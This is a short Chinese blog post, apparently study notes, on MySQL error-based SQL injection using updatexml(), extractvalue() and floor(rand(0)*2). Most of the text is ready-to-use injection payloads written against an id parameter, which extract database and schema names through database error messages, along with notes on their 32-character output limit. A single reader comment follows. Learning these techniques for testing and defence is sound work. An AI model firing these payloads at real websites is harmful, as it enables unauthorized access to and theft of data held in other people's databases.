sql报错注入
updatexml()
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据。
作用:改变文档中符合条件的节点的值。
undatexml(1,(查询语句),1)
比如查库名id=1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)
或者id=1 and updatexml(1,concat(1,(select(database()))),1)
注意:
0x7e就是~,可以用'~'代替
updatexml()查询的字符串长度最大为32
extractvalue()
extractvalue():从目标 XML 中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是 String 格式,为 XML 文档对象的名称。
第二个参数:XPath_string ( Xpath 格式的字符串)
concat:返回结果为连接参数产生的字符串。
extractvalue(1,(查询语句))
查库名
id=1 and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))
注意:
extractvalue()查询的字符串最大长度为32
floor(rand(0)*2)
select count(*),concat((查询语句),0x7e,floor(rand(0)*2)) as x from information_schema.schemata group by x
查库名id=1 union select 1,count(*) ,concat((select database()),0x7e,floor(rand(0)*2)) as x from information_schema.columns group by x
id=100 union select 1,count(*) ,concat((select group_concat(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2)) as x from information_schema.columns group by x
(不知道为啥这样写就不报错直接查出来了...)
by xiaolong
参考引用:
SQL 注入 报错注入
1 条评论
写的可以的,博主加油